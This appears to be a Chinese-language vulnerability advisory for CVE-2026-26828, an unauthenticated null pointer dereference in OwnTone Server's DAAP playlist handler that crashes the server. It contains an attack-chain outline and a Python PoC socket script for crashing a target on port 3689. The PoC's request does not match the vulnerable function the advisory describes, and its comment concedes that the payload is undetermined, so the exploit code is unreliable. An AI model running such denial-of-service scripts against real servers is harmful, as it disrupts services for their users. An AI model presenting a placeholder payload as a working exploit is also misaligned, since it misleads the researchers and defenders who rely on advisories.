CVE-2026-26828 CVSS 7.5 高危

CVE-2026-26828 OwnTone Server空指针解引用漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-26828

漏洞类型

空指针解引用

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OwnTone Server

漏洞概述

OwnTone Server的src/httpd_daap.c文件中daap_reply_playlists函数存在空指针解引用漏洞。攻击者无需认证即可通过网络发送特制的DAAP请求，触发该漏洞导致服务器崩溃，从而造成拒绝服务。

技术细节

该漏洞源于daap_reply_playlists函数在处理特定请求时，未对指针进行有效性检查。当攻击者向服务器发送精心构造的恶意DAAP（Digital Audio Access Protocol）数据包时，会导致程序尝试访问NULL指针地址。由于CVSS评分为7.5，且攻击向量为网络（AV:N），无需权限（PR:N）和用户交互（UI:N），远程攻击者可轻易利用此缺陷致使服务进程异常终止，严重影响系统可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，寻找开放了3689端口（DAAP默认端口）或其他特定端口的OwnTone Server实例。

STEP 2

2. 漏洞利用

攻击者利用脚本向目标服务器的daap_reply_playlists接口发送特制的恶意DAAP请求数据包。

STEP 3

3. 拒绝服务

服务器在处理请求时触发空指针解引用异常，导致服务进程崩溃，停止对正常请求的响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Target configuration
HOST = 'target_ip'  # Replace with the actual target IP
PORT = 3689         # Default DAAP port for OwnTone

def send_exploit():
    try:
        # Create a socket connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        
        # Crafted malicious DAAP request payload to trigger NULL pointer dereference
        # Note: The specific payload structure depends on the crash analysis of commit 3d1652d
        payload = b"GET /database?output=xml HTTP/1.1\r\nHost: " + HOST.encode() + b"\r\n\r\n"
        
        # Send the payload
        s.send(payload)
        print("[+] Payload sent successfully.")
        
        # Receive response (or lack thereof, indicating crash)
        response = s.recv(1024)
        print("[+] Server response:", response)
        
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    send_exploit()

影响范围

OwnTone Server commit 3d1652d 及之前版本

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用DAAP服务或通过网络安全设备（如WAF/IPS）部署规则以拦截异常的DAAP请求流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表